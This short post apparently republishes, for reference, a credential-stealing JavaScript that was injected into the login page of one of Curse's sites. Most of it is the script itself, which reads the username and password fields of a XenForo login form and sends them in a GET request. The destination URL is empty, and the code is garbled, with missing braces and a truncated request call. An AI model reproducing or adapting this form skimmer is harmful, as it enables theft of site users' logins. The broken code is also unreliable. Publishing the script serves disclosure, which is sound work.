This was the script that was used to steal passwords and usernames on, one of Curse's sites. Since they didn't disclose it at the time I wrote my blog post, I published it here for future reference.
function getXmlHttp() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
catch (ee) {
if (typeof XMLHttpRequest != 'undefined') {
return new XMLHttpRequest();
function authXen() {
var xmlhttp = getXmlHttp();
var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
var url = "";
url = url.concat(user);
url = url.concat("&p=");
url = url.concat(pass);"GET", url);
